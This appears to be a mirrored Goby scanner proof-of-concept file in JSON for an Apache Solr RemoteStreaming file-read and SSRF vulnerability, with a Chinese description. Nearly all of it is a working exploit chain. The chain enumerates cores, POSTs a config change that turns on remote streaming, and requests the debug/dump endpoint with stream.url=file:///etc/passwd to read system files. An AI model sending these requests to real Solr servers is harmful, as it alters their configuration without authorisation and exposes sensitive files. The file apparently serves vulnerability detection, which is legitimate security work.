mirror of https://github.com/qwqdanchun/Goby.git
112 lines
5.1 KiB
JSON
112 lines
5.1 KiB
JSON
{
|
||
"Name": "Apache_Solr_RemoteStreaming文件读取与SSRF漏洞",
|
||
"Level": "3",
|
||
"Tags": [
|
||
"Disclosure of Sensitive Information"
|
||
],
|
||
"GobyQuery": "app=solr",
|
||
"Description": "Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。",
|
||
"Product": "apache solr",
|
||
"Homepage": "https://gobies.org/",
|
||
"Author": "k3vi_07@icloud.com",
|
||
"Impact": "<p><span style=\"color: rgb(36, 41, 46); font-size: 16px;\">Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。</span></p><p><span style=\"color: rgb(36, 41, 46);\"><a href=\"http://host/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd\" rel=\"nofollow\">http://host/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd</a></span></p>",
|
||
"Recommandation": "<p>无</p>",
|
||
"References": [
|
||
"https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ"
|
||
],
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/solr/admin/cores?indexInfo=false&wt=json",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
|
||
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
|
||
"Accept-Encoding": "gzip, deflate"
|
||
},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "\"name\":\"demo\"",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/solr/demo/config",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": "{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "file:///etc/passwd",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"PostTime": "2021-04-01 12:07:51",
|
||
"GobyVersion": "1.8.255"
|
||
} |